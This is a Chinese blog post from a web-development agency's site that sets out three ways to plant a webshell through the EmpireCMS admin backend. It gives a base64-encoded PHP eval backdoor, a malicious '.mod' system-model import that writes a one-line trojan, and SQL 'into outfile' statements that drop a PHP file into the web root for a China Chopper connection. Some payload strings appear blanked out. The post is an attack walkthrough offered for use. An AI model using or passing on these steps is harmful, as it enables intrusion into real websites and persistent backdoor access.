Villain博客Villain博客

Villain博客 - www.1004619.com
承接网站建设、网站seo优化、微信小程序开发、帝国cms(dedecms)仿站二开等业务!

帝国cms最新版本后台拿webshell方法集合

方法 一:
自定义页面-增加自定义页面-随便写了xxx.php文件名,页面内容填写,
如果内容直接添一句话或者php大马是无用的,,因为他会生成xxx.php前先给你执行!!


PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 的base64加密。
所以生成xxx.php后 会出现内容 在文件里,然后用菜刀直接连接吧!!
方法 二:
 

进入后台~!

系统——数据表与系统模型——管理数据表
再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:

QQ截图20130506192307.gif

“导入系统模型”,可进入“LoadInM.php”页面,如图:

QQ截图20130506192844.gif

在本地新建一个文件,文本内容为<?fputs(fopen(“x.php”,”w”),””)?> 再命名为1.php.mod,导入这个mod文件,即执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件。
可以从导入系统模型源文件中查看到,如图:

QQ截图20130506193833.gif

方法 三:
在本地新建一个info.php(任意php文件)其源码内容为,再重名名为info.php.mod,将此文件按照方法一导入系统模型,即可执行info.php.mod的代码并显示在页面上,迅速查看源码即可得知网站根目录的绝对路径,如图:

QQ截图20130506194806.gif

QQ截图20130506195011.gif

info.php.mod的源码
然后
系统——备份与恢复数据——执行SQL语句
在执行SQL语句框中输入如下代码:
create table temp (cmd text not null);
insert into temp (cmd) values(‘’);
select cmd from temp into outfile ‘c://ecms//z.php’;
drop table if exists temp;
即可在网站根目录生成z.php
菜刀连接即可~!

漏洞证明:

QQ截图20130506194214.gif

QQ截图20130506200357.gif

赞一下
Villain博客
上一篇: PhpMyAdmin新姿势之GetShell 站长们要留神了
下一篇: dx论坛后台记录管理员密码 各位站长要好好检查
隐藏边栏